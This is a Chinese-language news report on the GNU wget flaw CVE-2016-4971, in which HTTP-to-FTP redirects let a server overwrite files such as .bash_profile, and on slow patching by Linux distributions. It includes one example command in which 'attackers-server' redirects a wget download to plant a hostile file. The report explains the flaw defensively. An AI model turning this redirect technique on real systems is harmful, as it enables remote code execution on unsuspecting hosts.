先前,安全研究員Dawid Golunski和SecuriTeam曝出GNU wget漏洞。6月9日,GNU wget項(xiàng)目發(fā)布文件下載包新版1.18修復(fù)漏洞。
CVE-2016-4971 漏洞回顧
GUN wget 作為*nix 系統(tǒng)常用下載工具,支持http、https、ftp 等多種協(xié)議,當(dāng)使用wget 下載文件時(shí),若初始下載http服務(wù)提供的下載資源, 如果服務(wù)器將下載資源重定向到ftp服務(wù)時(shí),wget 會(huì)默認(rèn)信賴http服務(wù)器重定向的ftp 鏈接地址和文件名,而不做二次驗(yàn)證。從而可能下載到惡意釣魚者的惡意文件,導(dǎo)致主機(jī)被入侵。
將近一個(gè)月后,包含GNU wget標(biāo)準(zhǔn)包的所有Linux發(fā)行版仍未修復(fù)被曝漏洞(CVE-2016-4971)。
GNU wget漏洞導(dǎo)致遠(yuǎn)程代碼執(zhí)行
安全研究員Dawid Golunski在公告中解釋道,惡意攻擊者能誘騙wget文件下載過程在Linux設(shè)備上執(zhí)行代碼。
Dawid Golunski通過電子郵件告訴外媒,“攻擊者可能潛在濫用漏洞上傳任意文件并執(zhí)行代碼。”
GNU wget是從網(wǎng)絡(luò)上自動(dòng)下載文件的Linux命令行實(shí)用工具。如果鏈接發(fā)生變化,GNU wget支持URL重定向。
當(dāng)重定向到FTP鏈接時(shí),GNU wget不重命名文件
Golunski發(fā)現(xiàn),當(dāng)從最初的HTTP URL重定向到FTP鏈接時(shí),wget不能正確處理文件名。
比 如,如果攻擊者通過wget控制定期下載文件的服務(wù)器,攻擊者可以使用302重定向文件。運(yùn)行wget http://attackers-server/safe_file.txt命令的用戶將被重定向到下載ftp://attackers-server /.bash_profile。
在正常的HTTP重定向到HTTP中,為了防止遠(yuǎn)程代碼執(zhí)行(Remote Code Execution,縮寫RCE),GNU wget將以原始文件名重命名第二個(gè)文件(.bash_profile to safe_file.txt)。然而,從HTTP重定向到FTP鏈接時(shí),wget不包含該安全機(jī)制。這個(gè)問題影響打補(bǔ)丁1.18版本之前的所有GNU wget版本。
因?yàn)閣get命令經(jīng)常用于大多數(shù)時(shí)候自動(dòng)執(zhí)行下載文件的腳本中,這就讓攻擊者有了可乘之機(jī)。所有系統(tǒng)管理員應(yīng)審查將wget作為首選下載內(nèi)容的Cronjobs。
受影響的Linux發(fā)行版遲遲未修復(fù)
雖然GNU wget項(xiàng)目履行了自己的職責(zé),但一些Linux發(fā)行版卻未及時(shí)更新。Golunski表示,只有Ubuntu將GNU wget1.18(如wget 1.17-1)包含在wget發(fā)行版更新中。Arch Linux等發(fā)行版自6月中旬就已修復(fù)了該問題。
另一熱門Linux OS—Debian特別配備了網(wǎng)絡(luò)專家修復(fù)該問題。Wget 1.18目前包含在最新“測試”和“不穩(wěn)定”版本中。
另一方面,Red Hat已經(jīng)推遲修復(fù)7.x中存在的該問題,同時(shí)還宣布未修復(fù)舊版6.x和5.x版本中的wget問題。
雖然CVE-2016-4971安全隱患較高,但打補(bǔ)丁的速度也比較慢。
研究人員通過電子郵件告訴外媒,“重要的是,wget發(fā)布了已經(jīng)發(fā)布了新版1.18,因此,如果用戶受影響且希望得到安全保障,他們可以下載官方資源。”
Golunski和SecuriTeam已經(jīng)發(fā)布了安全公告,內(nèi)容包含漏洞與概念驗(yàn)證詳情,以提高對問題的認(rèn)識。